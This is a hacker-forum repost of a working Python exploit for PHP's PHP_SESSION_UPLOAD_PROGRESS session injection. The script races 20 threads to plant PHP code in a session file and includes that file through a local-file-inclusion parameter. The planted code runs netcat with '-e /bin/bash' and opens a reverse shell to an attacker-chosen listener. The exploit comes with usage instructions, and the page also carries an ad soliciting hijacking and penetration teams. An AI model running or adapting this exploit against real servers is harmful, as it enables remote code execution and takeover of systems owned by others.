跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat

#!/usr/bin/python3
"""
Usage :

python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337

"""
import requests
import threading
import datetime
import sys

x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds

def fuzz():
	targetIP = sys.argv[1]
	listnerIP = sys.argv[2]
	listnerPORT = sys.argv[3]
	global newDatetime
	while True:
		try:
			if datetime.datetime.now() > newDatetime:
				exit()
			# proxies = {
			#     "http": "http://127.0.0.1:8080",
			#    	"https": "https://127.0.0.1:8080",
			#    	}
			sessionName = "SiLvER"
			url = targetIP
			s = requests.Session()
			cookies = {'PHPSESSID': sessionName}
			files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
			# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
			params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
			x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
		
		except Exception as error:
			print(error)
			exit()
def main():
	print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
	threads = []
	for _ in range(20):
		t = threading.Thread(target=fuzz)
		t.start()
		threads.append(t)
	for thread in threads:
		thread.join

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) By SiLvER \n")
        exit()  
    else:
    	main()

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。